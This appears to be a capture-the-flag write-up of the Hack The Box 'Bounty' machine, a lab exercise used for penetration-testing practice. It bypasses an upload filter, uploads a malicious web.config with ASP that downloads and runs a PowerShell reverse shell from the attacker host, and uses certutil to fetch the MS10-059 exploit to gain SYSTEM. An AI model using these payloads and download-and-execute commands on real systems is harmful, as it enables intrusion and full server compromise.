HTB - Bounty

Bounty

Getting Root

  1. The box only had port 80 running which had an application that allows to upload files while preventing asp, aspx and few other file extensions.

  2. I was bale to bypass the upload filter using a null byte %00.jpg but the application generated an error giving a clue about something related to web.config.

  3. After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded and I was able to get a shell.

  4. For privilege escalation, I was able to get system using MS10-059

Tools used:

nmap, nikto, gobuster, nishang, windows-exploit-suggester.py

Nmap

# Nmap 7.80 scan initiated Sun Mar  8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93  
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar  8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar  8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered

# Nmap done at Sun Mar  8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds

Enumerating HTTP

Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.

Nikto

Nothing much was found with Nikto

nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type  
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------

Gobuster

gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster/Bounty_gobuster.txt -t 40 -x asp,aspx,html,txt   
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     asp,aspx,html,txt
[+] Timeout:        10s
===============================================================
2020/03/08 22:24:47 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
===============================================================
2020/03/08 22:44:08 Finished
===============================================================

Testing transfer.aspx

I tried uploading a file with ASP, ASPX and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte %00 to attempt to bypass the upload filter.

Bypassing the upload filter using null byte %00

When I tried to execute the shellie.aspx file http://10.10.10.93/UploadedFiles/shellie.aspx I got the following error below.

I have no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and to my surprise, I found the following link stating that we can actually upload a *.config file with asp code and it would work.

Explanation of web.config as quoted from the link above:

Web.config

What is a web.config file?

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

With a web.config file, you can control:

Database connection strings.
Error behavior.
Security.

web.config files are XML documents. ‘.config’ is not an extension like ‘.html’ or ‘.txt’.

Getting a Reverse Shell

The link I found on google, refers to the following link below for the code they used in order to get RCE.

I used the example code I found but with a few modifications:

# cat web.config 
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ping 10.10.14.3")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>

Uploading the web.config file

I can also confirm using tcpdump:

# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:58:28.277292 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 1, length 40  
23:58:28.277378 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
23:58:29.271690 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 2, length 40
23:58:29.271752 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
23:58:30.270135 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 3, length 40
23:58:30.270165 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
23:58:31.268337 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 4, length 40
23:58:31.268366 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel

I used nishang reverse powershell script and modified the web.config code as follows:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />  
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.3/pwsh.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
  1. Uploaded the new web.config file

  2. Executed it via http://10.10.10.93/UploadedFiles/web.config

  3. Started the listener on port 8008 ( I edited on the nishang reverse tcp script)

  4. Got a shell as merlin

Started python http server

# To server the nishang revser powershell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -

# Listenner to capture the shell
# rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\users\merlin\desktop> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          3/9/2020, 5:22:56 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use:    501 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

Privilege Escalation

I used the windows exploit suggester

./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

I used MS10-059. A google search on MS10-059 github takes you to the following link with an exe executable

Download the executable to the target using certutil

PS C:\users\merlin\documents> certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe   

Executing the exploit

PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>    

Started a Listener

rlwrap nc -lnvp 9002
listening on [any] 9002 ...

Got Reverse Shell as SYSTEM

# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002


# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\merlin\documents>whoami
whoami
nt authority\system

C:\users\merlin\documents>

Last updated